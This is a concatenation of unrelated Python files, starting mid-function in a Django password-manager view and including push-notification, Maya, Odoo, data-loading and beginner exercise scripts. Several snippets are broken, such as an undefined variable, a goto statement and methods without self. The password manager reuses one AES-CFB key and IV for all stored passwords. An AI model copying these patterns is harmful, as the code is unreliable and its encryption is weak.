pos = randint(0, len(before_password) - 1) # pick random position to insert item
before_password = "".join((before_password[:pos], item, before_password[pos:])) # insert item at pos
password = before_password
else:
if data['use_lower']:
charset += string.ascii_lowercase
if data['use_upper']:
charset += string.ascii_uppercase
if data['use_digits']:
charset += string.digits
if data['use_special']:
charset += string.punctuation
if data['avoid_similar']:
charset = [c for c in charset if c not in similar_chars]
password = get_random_string(length, charset)
if request.method == 'POST' and 'AddSubmit' in request.POST:
addform = PasswordForm(request.POST, prefix='add')
generateform = GeneratePasswordForm(request.POST or None, prefix='generate')
if addform.is_valid():
encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
s = Passwords()
s.userid = addform.cleaned_data['userid']
s.pw = encryption_suite.encrypt(addform.cleaned_data['pw'].encode('utf-8')).hex()
s.web = addform.cleaned_data['web']
s.email = addform.cleaned_data['email']
s.user = request.user
s.save()
return redirect('/password/')
else:
addform = PasswordForm(prefix='add')
generateform = GeneratePasswordForm(prefix='generate')
extra_context = {
'add_form':PasswordForm(prefix='add'),
'generate_form':GeneratePasswordForm(prefix='generate'),
'password':password, 'length':length,
}
return render(request, 'password/add_pw.html', extra_context)
@login_required
def del_pw(request, id):
obj = Passwords.objects.get(id = id)
if request.method == 'POST':
if obj.user.id == request.user.id:
obj.delete()
return redirect('../../')
return HttpResponse('No Permission')
context = {
'object': obj
}
return render(request, "password/del_pw.html", context)
similar_chars = {'o', 'O', '0', 'I', 'l', '1', '|'}
def generate_pw(request):
form = GeneratePasswordForm(request.POST or None)
if not form.is_valid():
context = {'password' : 'Your password will show here', 'length': 12, 'form': form}
else:
data = form.cleaned_data
charset = ''
if data['use_lower']:
charset += string.ascii_lowercase
if data['use_upper']:
charset += string.ascii_uppercase
if data['use_digits']:
charset += string.digits
if data['use_special']:
charset += string.punctuation
if data['avoid_similar']:
charset = [c for c in charset if c not in similar_chars]
length = data['length']
password = get_random_string(length, charset)
context = {'password': password, 'length': length, 'form': form}
return render(request, 'password/generate_pw.html', context)
@login_required
def verify_pw(request):
if request.method == 'POST':
if check_password(request.POST.get("Password"), request.user.password):
_, _, salt, _ = request.user.password.split('$')
key = pbkdf2(request.POST.get("Password"), salt, 50000, 48)
request.session['iv'] = key[0:16].hex()
request.session['cipherKey'] = key[16:].hex()
return redirect('/password/')
else:
messages.error(request, 'Incorrect Password')
return render(request, "password/verify_pw.html", {})
@login_required
def search(request):
if request.method == 'GET':
query = request.GET.get('q')
results = Passwords.objects.filter(user = request.user)
results = results.annotate(similarity = TrigramSimilarity('web', query)).filter(similarity__gt = 0.1).order_by('-similarity')
for obj in results:
encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
return render(request, 'password/search.html', {'results':results})
else:
return render(request, 'password/search.html', {})
@login_required
def change_pw(request):
if request.method == 'POST' and request.user.is_authenticated:
if 'cipherKey' not in request.session:
return redirect('verify_pw')
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
data = Passwords.objects.filter(user = request.user)
_, _, salt, _ = user.password.split('$')
pw = form.cleaned_data['new_password1']
key = pbkdf2(pw, salt, 50000, 48)
key,iv = key[16:], key[0:16]
for obj in data:
encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
new_encryption_suite = AES.new(key, AES.MODE_CFB, iv)
obj.pw = new_encryption_suite.encrypt(obj.pw.encode('utf-8')).hex()
obj.save()
logout(request)
return redirect('login')
else:
return render(request, 'password/change_pw.html', {'password_change_form' : form})
else:
form = PasswordChangeForm(request.user)
return render(request, 'password/change_pw.html', {'password_change_form' : form})
|
import sqlite3
from app import app
from flask import flask
from flask import redirect, render_template
from view import checkLogin
"""
@app.route('/login')
def login():
return flask.render_template("login.html")
@app.route('/Sign Up')
def auth_user():
return flask.render_template("auth_user.html")
"""
def validate(request):
if checkLogin(request) == 1:
return redirect('/')
else:
return render_template("login.html", error='UserId or password Incorrect') |
"""
Implements Lovell's correlation metric
"""
from __future__ import division
import numpy as np
from composition import clr
def lovellr(x, y):
"""
Calculates proportional goodness of fit
Parameters
----------
x : array_like
y : array_like
Returns
-------
float : proportional goodness of fit
"""
x, y = np.array(x), np.array(y)
# x_idx = (x > 0)
# y_idx = (y > 0)
# # Drop zeros
# idx = np.logical_and(x_idx, y_idx)
# m = np.vstack((x[idx], y[idx])).T
# _x, _y = clr(m).T
return np.var(_x - _y) / np.var(_x)
def zhengr(x, y):
"""
Calculates proportional correlation coefficient
Parameters
----------
x : array_like
y : array_like
Returns
-------
float : proportional correlation coefficient
"""
_x, _y = np.array(x), np.array(y)
# x_idx = (x > 0)
# y_idx = (y > 0)
# # Drop zeros
# idx = np.logical_and(x_idx, y_idx)
# _x, _y = clr(x[idx]), clr(y[idx])
return 2*np.cov(_x, _y)[1, 0] / (np.var(_x) + np.var(_y))
def get_corr_matrix(mat, func):
"""
Generates a correlation matrix
Parameters
----------
mat : np.array
Contingency table
columns = OTUs
rows = samples
func : function
correlation function
Returns
-------
np.array :
correlation matrix
"""
r, c = mat.shape
corr_mat = np.zeros((c, c))
for i in range(c):
for j in range(i):
corr_mat[i, j] = func(mat[:, i], mat[:, j])
corr_mat += corr_mat.T
return corr_mat
|
#!/usr/bin/env python
# Copyright 2016 Udey Rishi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import shutil
import os
from subprocess import call
import sys
if __name__ == '__main__':
parser = argparse.ArgumentParser('Build Logic and LogicTests')
parser.add_argument('-d', '--debug', help='Build the debug version', action='store_true')
parser.add_argument('-r', '--rebuild', help='Clean before building', action='store_true')
args = parser.parse_args()
if args.rebuild:
try:
shutil.rmtree('out')
except OSError:
pass
build_type = 'debug' if args.debug else 'release'
out_dir = os.path.join('out', build_type)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
os.chdir(out_dir)
cmake_args = ['cmake', '-DCMAKE_BUILD_TYPE=' + build_type]
if 'COMPILER' in os.environ:
cmake_args.append('-DCMAKE_CXX_COMPILER=' + os.environ['COMPILER'])
cmake_args.append('../..')
code = call(cmake_args)
if code:
exit(code)
code = call(['make'])
if code:
exit(code)
|
import os
import logging
import pandas as pd
# from ASF.datasets.data_utils import read_tuple
logger = logging.getLogger(__name__)
testing_subjects = [8, 10, 16, 17, 18, 19, 20]
def get_mpii_cooking_dataset(**kwargs):
# [act, start (0-base), end (0-base, not included)]
metadata = {
# "video_root": './data/mpii/videos/videos',
"video_root": './data/mpii/videos/mp4',
"gt_root": './data/mpii/detectionGroundtruth-1-0.csv',
"mapping_file": './data/mpii/mapping_mpii.txt',
"n_splits": len(testing_subjects),
}
metadata.update(kwargs)
df = pd.read_csv(
metadata['gt_root'],
names=["subject", 'file_name', 'start_frame', 'end_frame', 'activity_category_id', 'activity_category_name'])
df['start_frame'] -= 1
gb_df = df.groupby(['file_name', 'subject'])
new_df = gb_df['activity_category_name'].apply(list).to_frame(name='activity_category_name')
new_df['start_frame'] = gb_df['start_frame'].apply(list)
new_df['end_frame'] = gb_df['end_frame'].apply(list)
dataset_dict = []
for row in new_df.reset_index().itertuples():
gt = list(zip(row.start_frame, row.activity_category_name, row.start_frame, row.end_frame))
gt = [g[1:] for g in sorted(gt)]
dataset_dict.append({
# "video_path": os.path.join(metadata['video_root'], f'{row.file_name}.avi'),
"video_path": os.path.join(metadata['video_root'], f'{row.file_name}.mp4'),
"annotations": gt,
"video_len": gt[-1][-1],
"split": testing_subjects.index(row.subject) if row.subject in testing_subjects else len(testing_subjects),
})
return dataset_dict, metadata
|
# --------------------------------------------------------------------
import os
# --------------------------------------------------------------------
def tri_recursion (k): # tri_recursion (def_param = 10) -> Sets the default parameter if none given
if k > 0:
result = k + tri_recursion (k - 1) # (1 + 0) + (2 + 1) + (3 + 3) + (4 + 6) + (5 + 10) + (6 + 15)
print (result)
else:
result = 0
return result
print ("\n\nRecursion Example Results")
tri_recursion (6)
# --------------------------------------------------------------------
os.system ("pause")
|
print("Exercise") |
import requests
# from urllib.parse import quote_plus
from seaweed.settings import BASE_DIR
import os
from collections import OrderedDict
from urllib.parse import quote_plus
import time
from collections import ChainMap
two_seps = os.linesep * 2
sep = os.linesep
class Dict(dict):
# def __getattribute__(self, key):
# return self[key]
def __getattr__(self, key):
return self[key]
def headers_to_dict(h):
# return dict format data or headers
r = {}
li = h.split(sep)
for i in li:
# r[i.split(':', 1)[0]] = i.split(': ', 1)[1]
r[i.split(':', 1)[0]] = i.split(':', 1)[1].strip()
return r
def data_to_list(data):
data_list = list()
li = data.split(sep)
for i in li:
data_list.append([i.split(":", 1)[0], i.split(":", 1)[1]])
return data_list
def order_dict(d, order_d):
li = [(k, d[k]) for k in sorted(order_d, key=order_d.get)]
return OrderedDict(li)
def parse_text(file):
file_str = ''
with open(file, 'rb') as f:
file_str = f.read().decode('utf-8')
lhs = file_str.split(two_seps)
body = data_to_list(lhs[1])
lh = lhs[0].split(sep, 1)
headers = headers_to_dict(lh[1])
line = lh[0].split(' ')
method = line[0]
if line[1].startswith('http'):
url = line[1]
else:
# url = 'https://' + headers['Host'] + line[1]
# xiaomi更换了host dev.xiaomi.com to dev.mi.com
# 模板里的host不对了 这里写死
url = 'https://' + 'dev.mi.com' + line[1]
return method, url, headers, body
def get_expire():
return str(int((time.time() + 1000) * 1000))
class PushForbiddenException(Exception):
pass
class Push(object):
DIR = os.path.join(BASE_DIR, 'push.conf')
# ANDROID_INDEX = {"expires": 14, "title": 5,
# "description": 6, "payload": 10, "target": 7}
# IOS_INDEX = {"expires": 11, "category": 4, "description": 1,
# "id": 5, "target": 6}
# ANDROID_ORDER = {"expires": 5, "title": 1,
# "description": 2, "payload": 3, "target": 4}
# IOS_ORDER = {"expires": 56, "id": 4,
# "description": 2, "category": 3, "target": 5}
ANDROID_INDEX = {"title": 5, "description": 6,
"payload": 10, "target": 7, "apiType": 8}
IOS_INDEX = {"category": 4, "description": 1,
"id": 5, "target": 6, "apiType": 7}
ANDROID_ORDER = {"title": 1, "description": 2, "payload": 3, "target": 4}
IOS_ORDER = {"id": 4, "description": 2, "category": 3, "target": 5}
ANDROID_EXPIRES = {"expires": 14}
IOS_EXPIRES = {"expires": 11}
PRODUCT_APPIDS = {'amp': '1008284',
'avp': '1005286',
'imp': '2882303761517418140',
'ivp': '2882303761517421667'}
TEST_APPIDS = {'amt': '2882303761517414257',
'avt': '2882303761517473392',
'imt': '2882303761517469186',
'ivt': '2882303761517473393'}
def __init__(self, file):
self.fname = file
# self.fname = os.path.split(os.path.abspath(file))[1]
assert self.fname.startswith('i') or self.fname.startswith('a')
result = parse_text(os.path.join(Push.DIR, file))
self.method, self.url, self.headers, self.body = result[
0], result[1], result[2], result[3]
self.check_template()
def update_body(self, dct):
if dct:
for d in dct:
if self.fname.startswith('a'):
self.body[Push.ANDROID_INDEX[d]][1] = dct[d]
elif self.fname.startswith('i'):
self.body[Push.IOS_INDEX[d]][1] = dct[d]
if self.fname.startswith('a'):
self.body[Push.ANDROID_EXPIRES['expires']][1] = get_expire()
if self.fname.startswith('i'):
self.body[Push.IOS_EXPIRES['expires']][1] = get_expire()
# 删除后悔导致index改变 不删除看上去没什么影响
# if dct["apiType"] == "broadcast":
# # dct.pop("target")
# del self.body[Push.ANDROID_INDEX['target']]
return self
def get_fields(self):
result = Dict()
if self.fname.startswith('a'):
for k, v in Push.ANDROID_INDEX.items():
result[k] = self.body[v][1]
return order_dict(result, Push.ANDROID_ORDER)
else:
for k, v in Push.IOS_INDEX.items():
result[k] = self.body[v][1]
return order_dict(result, Push.IOS_ORDER)
def check_template(self):
# 校验模板的正确性
# 1 文件名称跟pid匹配
# 2 body长度固定
all_appids = ChainMap(Push.TEST_APPIDS, Push.PRODUCT_APPIDS)
aid = all_appids[self.fname[:3]]
try:
assert aid in self.url
except AssertionError:
raise PushForbiddenException(
'{}: appid should be {}'.format(self.fname, aid))
length = len(self.body)
try:
if self.fname.startswith('a'):
assert length == 25
else:
assert length == 18
except AssertionError:
raise PushForbiddenException(
'{}: illegal body length'.format(self.fname))
print('perfect template: {}'.format(self.fname))
def check_prod(self):
# broadcast not allowed in prod
if self.fname.startswith('a'):
t = self.body[Push.ANDROID_INDEX["apiType"]][1]
else:
t = self.body[Push.IOS_INDEX["apiType"]][1]
if t == "broadcast":
for k, v in Push.PRODUCT_APPIDS.items():
if v in self.url:
raise PushForbiddenException('{} {}'.format(self.fname, v))
elif t == "alias":
pass
else:
print(self.body)
raise PushForbiddenException('apiType index error: {}'.format(t))
def request(self):
body_str = ''
for item in self.body:
body_str = body_str + \
quote_plus(item[0]) + "=" + quote_plus(item[1]) + "&"
body_str = body_str[:-1]
print('body: ' + body_str)
self.check_prod()
res = requests.request(self.method, self.url,
headers=self.headers, data=body_str)
print('res: ' + res.text)
# if res.json().get('errorCode') == 0:
# return "success"
# return "fail"
return res.json()
@staticmethod
def get_push_list(typ):
files = [f for f in os.listdir(Push.DIR) if f.startswith(typ)]
result = list()
for file in files:
result.append({file: Push(file).get_fields()})
return result
|
import maya.mel as mel
import maya.cmds as cmds
from functools import partial
class RenegadeBaseSet(object):
def createLightSelects(self, *args):
# creates Char_lgae_S render elements
render_elements = cmds.ls(type="VRayRenderElement")
mel.eval('vrayAddRenderElement LightSelectElement;')
charAlgaeS_Sel = cmds.ls(selection=True)
charAlgaeS_newName = cmds.rename(charAlgaeS_Sel[0], "Char_Algae_S")
cmds.setAttr(charAlgaeS_newName + '.vray_name_lightselect',
'Char_Algae_S',
type='string')
cmds.setAttr(charAlgaeS_newName + '.vray_type_lightselect', 3)
cmds.setAttr(charAlgaeS_newName + '.enabled', 0)
# creates Char_lgae_D render elements
render_elements = cmds.ls(type="VRayRenderElement")
mel.eval('vrayAddRenderElement LightSelectElement;')
charAlgaeD_Sel = cmds.ls(selection=True)
charAlgaeD_newName = cmds.rename(charAlgaeD_Sel[0], "Char_Algae_D")
cmds.setAttr(charAlgaeD_newName + '.vray_name_lightselect',
'Char_Algae_D', type='string')
cmds.setAttr(charAlgaeD_newName + '.vray_type_lightselect', 2)
cmds.setAttr(charAlgaeD_newName + '.enabled', 0)
# adding specific lights to render elements
renBaseALights = cmds.ls('*:*:DTX_AlgaeGlow*:AlgaeLight_*')
if renBaseALights == []:
self.complete()
else:
for i in range(0, (len(renBaseALights))):
cmds.connectAttr((renBaseALights[i] + '.instObjGroups[0]'),
(charAlgaeD_newName +
'.dagSetMembers[' + str(i) + ']'))
cmds.connectAttr((renBaseALights[i] + '.instObjGroups[0]'),
(charAlgaeS_newName +
'.dagSetMembers[' + str(i) + ']'))
self.lightsOn(charAlgaeD_newName, charAlgaeS_newName,
renBaseALights)
# function that runs through all the layers
# and determines if it needs the light
# select added or not
def lightsOn(self, charAlgaeD_newName, charAlgaeS_newName, renBaseALights):
current = cmds.editRenderLayerGlobals(query=True,
currentRenderLayer=True)
if current == 'masterLayer':
cmds.editRenderLayerGlobals(currentRenderLayer='ST_RenegadeBaseA_INT_Day')
for layer in cmds.ls(type='renderLayer'):
if 'defaultRenderLayer' in layer:
cmds.setAttr(charAlgaeS_newName + '.enabled', 1)
cmds.setAttr(charAlgaeD_newName + '.enabled', 1)
elif 'CH_' in layer:
if '_Shadow' in layer:
pass
elif '_RGB' in layer:
pass
else:
print 'Character layer captured : %s' % (layer)
cmds.editRenderLayerGlobals(currentRenderLayer=layer)
cmds.editRenderLayerAdjustment(charAlgaeS_newName +
'.enabled')
cmds.editRenderLayerAdjustment(charAlgaeD_newName +
'.enabled')
cmds.setAttr(charAlgaeS_newName + '.enabled', 1)
cmds.setAttr(charAlgaeD_newName + '.enabled', 1)
status = cmds.getAttr(charAlgaeD_newName + '.enabled')
if status == 0:
cmds.setAttr(charAlgaeS_newName + '.enabled', 1)
cmds.setAttr(charAlgaeD_newName + '.enabled', 1)
cur = cmds.editRenderLayerGlobals(query=True,
currentRenderLayer=True)
cmds.select(renBaseALights)
shapes = cmds.listRelatives(renBaseALights,
allDescendents=True,
type="shape")
for i in shapes:
cmds.editRenderLayerMembers(cur, i, nr=True)
else:
pass
self.complete()
def topDownFillMover(self, *args):
characterCtrls = cmds.ls('*:*:DTX_LgtRg_Character_A:Lgt_Fill_Ctrl')
for layer in cmds.ls(type='renderLayer'):
if 'CH_' in layer:
cmds.editRenderLayerGlobals(currentRenderLayer=layer)
for ctrls in characterCtrls:
cmds.setAttr(ctrls + '.rotateY', 0)
cmds.setAttr(ctrls + '.rotateX', -90)
cmds.spaceLocator(name='Scene_Checked')
# UI created to aid artist in creation of Light Select Render Elements
def algaeLights(self, *args):
if cmds.window('algaeLights', exists=True):
delete = cmds.deleteUI('algaeLights')
algaeLights = cmds.window('algaeLights', t='Algae Light Pass Creator',
s=False, mnb=False, mxb=False)
cmds.columnLayout()
cmds.frameLayout(label='RenegadeBaseA_INT', bgc=[0.6, 0.2, 0.2])
cmds.separator(h=10, style='in')
cmds.text(label='Fix for Known Issues with this Set', align='center')
cmds.button('top_fill', label='Rotate Fill Lights',
c=partial(self.topDownFillMover), w=250, h=40)
cmds.button('render_elements', label='Create Render Elements',
c=partial(self.createLightSelects), w=250, h=40)
cmds.separator(h=10, style='none')
cmds.setParent('..')
cmds.showWindow(algaeLights)
def complete(self, *args):
if cmds.window('complete', exists=True):
delete = cmds.deleteUI('complete')
if cmds.window('algaeLights', exists=True):
delete = cmds.deleteUI('algaeLights')
if cmds.window('ST_Garage_EXT', exists=True):
cmds.deleteUI('ST_Garage_EXT')
if cmds.window('Tree_EXT', exists=True):
cmds.deleteUI('Tree_EXT')
if cmds.window('ST_Garage_INT', exists=True):
cmds.deleteUI('ST_Garage_INT')
queryWindow = cmds.window('complete', t='Complete Script',
s=False, mnb=False, mxb=False)
cmds.columnLayout()
cmds.frameLayout(label='Custom Render Elements ', bgc=[0.6, 0.2, 0.2])
cmds.separator(h=10, style='in')
cmds.text(label='Congrats Tool Was Sucessful',
align='center')
cmds.button('Complete', l='Complete', c=partial(self.delete),
w=250, h=40)
cmds.separator(h=10, style='none')
cmds.setParent('..')
cmds.showWindow(queryWindow)
def delete(self, *args):
if cmds.window('complete', exists=True):
delete = cmds.deleteUI('complete')
cmds.spaceLocator(name='Scene_Checked')
|
#factorial
#1*2*3....*n
n = int(input("Enter a number: "))
fact = 1
while n >=1:
fact = fact * n
n = n - 1
print(fact)
|
# 연습문제
# Q2
import re
p = re.compile('[a-z]+')
m = p.search('3 python')
sum = m.start() + m.end()
print(m.start())
print(m.end())
print(m.group())
print(sum)
# Q3
print('\nQ3')
import re
data ="""
park 010-9999-9988
kim 010-9909-7789
lee 010-8789-7768
"""
def change_phoneNum(data):
p = re.compile('(\w+\s+\d+[-]\d+[-])(\d+)',re.MULTILINE)
print(p.sub('\g<1>####',data))
change_phoneNum(data)
# Q4
print('\nQ4')
def imail_check(data):
p = re.compile('.*[@].*(?=[.]com$|[.]net$)',re.MULTILINE)
print(p.findall(data))
data ="""
park@naver.com
kim@daum.net
lee@myhome.co.kr
"""
imail_check(data)
|
import tree
from collections import OrderedDict
root = tree.create_tree()
d = OrderedDict()
def verticalSum(root, column):
global d
if root is None:
return None
verticalSum(root.left, column-1)
if d.has_key(column):
d[column] = d[column] + root.key
else:
d[column] = root.key
verticalSum(root.right, column+1)
verticalSum(root, 0)
print d
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from odoo.addons.account.models.account_invoice import TYPE2JOURNAL
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
@api.model
def _default_journal(self):
journal = super(AccountInvoice, self)._default_journal()
if journal or self._context.get('company_id'):
return journal
inv_type = self._context.get('type', 'out_invoice')
inv_types = inv_type if isinstance(inv_type, list) else [inv_type]
company = self.env['res.company']._company_default_get('account.invoice')
domain = [
('type', 'in', filter(None, map(TYPE2JOURNAL.get, inv_types))),
('company_id', '=', company.id),
]
return self.env['account.journal'].search(domain, limit=1)
journal_id = fields.Many2one(default=_default_journal)
company_id = fields.Many2one(domain=[('chart_template_id', '!=', False)])
|
import asyncio
from threading import Lock, Thread
from concurrent.futures import ThreadPoolExecutor
TPE = ThreadPoolExecutor()
class NoNewData(Exception):
pass
def readline(handle):
offset = handle.tell()
handle.seek(0, 2)
length = handle.tell()
if length == offset:
raise NoNewData
handle.seek(offset, 0)
return handle.readline()
import time
def tail_file(handle, interval, write_func):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def write_async(data):
write_func(data)
coro = tail_async(handle, interval, write_async)
loop.run_until_complete(coro)
async def tail_async(handle, interval, write_func):
loop = asyncio.get_event_loop()
while not handle.closed:
try:
line = await loop.run_in_executor(TPE, readline, handle)
except NoNewData:
await asyncio.sleep(interval)
handle.close()
else:
await write_func(line)
def run_threads(handles, interval, output_path):
with open(output_path, 'wb') as output:
lock = Lock()
def write(data):
with lock:
output.write(data)
threads = []
for handle in handles:
args = (handle, interval, write)
thread = Thread(target=tail_file, args=args)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def confirm_merge(input_paths, output_path):
inputs_cnt = output_cnt = 0
for f in os.listdir(input_paths):
with open(os.path.join(input_paths, f), 'r') as fh:
inputs_cnt += len(fh.readlines())
with open(output_path, 'r') as fh:
output_cnt += len(fh.readlines())
print(inputs_cnt, output_cnt)
assert inputs_cnt == output_cnt
import os
input_paths = 'test_inputs'
handles = [open(os.path.join(input_paths, f), 'rb') for f in os.listdir(input_paths)]
output_path = 'merge_test.txt'
run_threads(handles, 0.1, output_path)
confirm_merge(input_paths, output_path) |
"""Provides interface to CIMAGE."""
from ctesi.utils import CimageParams
from copy import deepcopy
from collections import defaultdict, OrderedDict
import config.config as config
import pathlib
import requests
import subprocess
import os
QUANT_PARAMS_PATH = config.SEARCH_PARAMS_PATH.parent.joinpath('quantification')
def quantify(name, dta_link, experiment_type, path, search_params=None, setup_dta=True):
if setup_dta:
setup_dta_folders(name, path, dta_link, search_params)
dta_paths = _get_dta_paths(name, path)
for dta_path in dta_paths.values():
symlink_mzxmls(path, dta_path.parent)
params_path = str(_get_params_path(experiment_type, path, search_params))
normal_search = cimage(params_path, dta_paths['lh'], name, hl_flag=False)
inverse_search = cimage(params_path, dta_paths['hl'], name, hl_flag=True)
if normal_search == 0 and inverse_search == 0:
return (
combine(dta_paths['lh'].parent, experiment_type) == 0 and
combine(dta_paths['hl'].parent, experiment_type) == 0
)
else:
return False
def cimage(params_path, dta_folder_path, name, hl_flag):
if hl_flag:
name = '{}_HL'.format(name)
return subprocess.Popen([
'cimage2',
params_path,
name
], cwd=str(dta_folder_path)).wait()
def combine(path, experiment_type, dta_folder='dta'):
args = [
'cimage_combine',
'output_rt_10_sn_2.5.to_excel.txt',
dta_folder
]
if experiment_type != 'isotop':
args.insert(1, 'by_protein')
return subprocess.Popen(args, cwd=str(path)).wait()
def symlink_mzxmls(src, dst):
mzxmls_paths = pathlib.Path(src).glob('*.mzXML')
for x in mzxmls_paths:
try:
os.symlink(str(x), str(dst.joinpath(x.name)))
except FileExistsError:
pass
def setup_dta_folders(name, path, dta_link, search_params=None):
# download dta results
# yes, this is a publicly accessible url. lol.
r = requests.get(dta_link)
dta_content = r.text
# find and replace diff mods with appropriate symbols
if search_params and 'diff_mods' in search_params:
symbol_mod_map = _symbolify_diff_mods(search_params['diff_mods'])[0]
for symbol, mods in symbol_mod_map.items():
for mod in mods:
dta_content = dta_content.replace('({})'.format(mod['mass']), symbol)
dta_paths = _get_dta_paths(name, path)
for dta_path in dta_paths.values():
dta_path.mkdir(parents=True, exist_ok=True)
dta_path.joinpath('DTASelect-filter_{}_light.txt'.format(name)).write_text(dta_content)
dta_path.joinpath('DTASelect-filter_{}_heavy.txt'.format(name)).write_text(dta_content)
return dta_paths
def _get_dta_paths(name, path):
return {
'lh': path.joinpath('{}_LH'.format(name), 'dta'),
'hl': path.joinpath('{}_HL'.format(name), 'dta')
}
def _get_params_path(experiment_type, path, search_params=None):
params_path = QUANT_PARAMS_PATH.joinpath(experiment_type).with_suffix('.params').resolve()
if search_params and 'diff_mods' in search_params:
return _make_custom_params(path, params_path, search_params['diff_mods'])
else:
return params_path
def _make_custom_params(exp_path, params_path, diff_mods):
params = CimageParams(str(params_path))
(symbol_mod_map, diff_mods) = _symbolify_diff_mods(diff_mods)
for symbol, mods in symbol_mod_map.items():
for mod in mods:
row = OrderedDict()
for atom in params.chem_headers:
if atom in mod['comp']:
row[atom.upper()] = mod['comp'][atom]
else:
row[atom.upper()] = 0
if mod['light']:
params.light[mod['symbol']] = row
if mod['heavy']:
params.heavy[mod['symbol']] = row
light_path = exp_path.resolve().joinpath('custom.light')
heavy_path = exp_path.resolve().joinpath('custom.heavy')
custom_params_path = exp_path.resolve().joinpath('custom.params')
params['light.chem.table'] = str(light_path)
params['heavy.chem.table'] = str(heavy_path)
params.write_file(str(custom_params_path))
params.write_chem_tables(light_path=str(light_path), heavy_path=str(heavy_path))
return custom_params_path
def _symbolify_diff_mods(diff_mods):
# we're mutating this a lot, better to work on copy
diff_mods = _degen_annotate_diff_mods(deepcopy(diff_mods))
diff_symbols = ['*', '#', '@']
symbols = iter(diff_symbols)
symbol_mod_map = defaultdict(list)
for mod in diff_mods:
# make sure we haven't already paired this one up
if 'symbol' in mod:
symbol_mod_map[mod['symbol']].append(mod)
continue
try:
# first we add diff-mods that appear in both light and heavy
# and then attempt to find a pair
if mod['light'] and mod['heavy']:
mod['symbol'] = next(symbols)
elif mod['light'] or mod['heavy']:
opposite = 'heavy' if mod['light'] else 'light'
same = 'light' if mod['light'] else 'heavy'
# find another diff mod with same isotopically degerate formula
paired_mod = next((
x for x in diff_mods
if 'symbol' not in x
and x[opposite]
and not x[same]
and x['degen'] == mod['degen']
), None)
symbol = next(symbols)
if paired_mod:
paired_mod['symbol'] = symbol
mod['symbol'] = symbol
if 'symbol' in mod:
symbol_mod_map[mod['symbol']].append(mod)
except StopIteration:
# we've run out of symbols to hand out...
break
return (symbol_mod_map, diff_mods)
def _degen_annotate_diff_mods(diff_mods):
# group diff mods by chemical formula not taking into account isotopic composition
# these molecules get the same symbol
degen_map = {
'C': 'C13',
'H': 'H2',
'N': 'N15'
}
for mod in diff_mods:
mod['degen'] = deepcopy(mod['comp'])
for element, isotope in degen_map.items():
if isotope in mod['degen']:
mod['degen'][element] += mod['degen'][isotope]
del mod['degen'][isotope]
return diff_mods
|
class Book():
def __init__(self, text, name):
self.text = text
self.name = name
def getText():
return self.text
def getName():
return self.name
|
#import sys
#input = sys.stdin.readline
from math import sqrt
def main():
N = int( input())
SX = [0 for _ in range(4)]
SY = [0 for _ in range(4)]
x_plus = 0
x_minus = 0
y_plus = 0
y_minus = 0
for _ in range(N):
x, y = map( int, input().split())
if x >= 0:
if y >= 0:
SX[0] += x
SY[0] += y
if y <= 0:
SX[1] += x
SY[1] += y
if x <= 0:
if y >= 0:
SX[2] += x
SY[2] += y
if y <= 0:
SX[3] += x
SY[3] += y
if x == 0:
if y > 0:
y_plus += y
else:
y_minus += y
if y == 0:
if x > 0:
x_plus += x
else:
x_minus += x
ans = 0
print(SX, SY, y_plus)
for i in range(4):
if ans**2 < SX[i]**2 + SY[i]**2:
ans = sqrt(SX[i]**2 + SY[i]**2)
print(ans)
S = (SX[0]+SX[3]-x_plus)**2 + (SY[0]+SY[3])**2
if ans**2 < S:
ans = sqrt(S)
S = (SX[1]+SX[2]-x_minus)**2 + (SY[1]+SY[2])**2
if ans**2 < S:
ans = sqrt(S)
S = (SX[0]+SX[1])**2 + (SY[0]+SY[1] - y_plus)**2
if ans**2 < S:
ans = sqrt(S)
S = (SX[2]+SX[3])**2 + (SY[2]+SY[3] - y_minus)**2
if ans**2 < S:
ans = sqrt(S)
print(ans)
if __name__ == '__main__':
main()
|
from ajax_select import LookupChannel, register
from . import models as base
from . import society
@register('society_look')
class PartnersPostLookup(LookupChannel):
model = base.ResPartner
def get_query(self, q, request):
return self.model.objects.filter(name__icontains=q).order_by('name')
@register('partner_post_look')
class PartnersPostLookup(LookupChannel):
model = base.ResPost
def get_query(self, q, request):
return self.model.objects.filter(name__icontains=q).order_by('name')
|
def binary_search(x, lst, low=None, high=None) :
start:
if low == None : low = 0
if high == None : high = len(lst)-1
mid = low + (high - low) // 2
if low > high :
return None
elif lst[mid] == x :
return mid
elif lst[mid] > x :
(x, lst, low, high) = (x, lst, low, mid-1)
goto start
else :
(x, lst, low, high) = (x, lst, mid+1, high)
goto start
|
import json
import os
from unipath import Path
from .base import *
DEV_SECRETS_PATH = SETTINGS_PATH.child("staging_secrets.json")
with open(os.path.join(DEV_SECRETS_PATH)) as f: secrets = json.loads(f.read())
INSTALLED_APPS = INSTALLED_APPS + ('mod_wsgi.server', )
PROPAGATE_EXCEPTIONS = True
DEBUG=True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'blast_cache_db',
'USER': get_secret("BC_USER", secrets),
'PASSWORD': get_secret("BC_PASSWORD", secrets),
'HOST': '1',
'PORT': '5432',
}
}
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'',
'',
'',
]
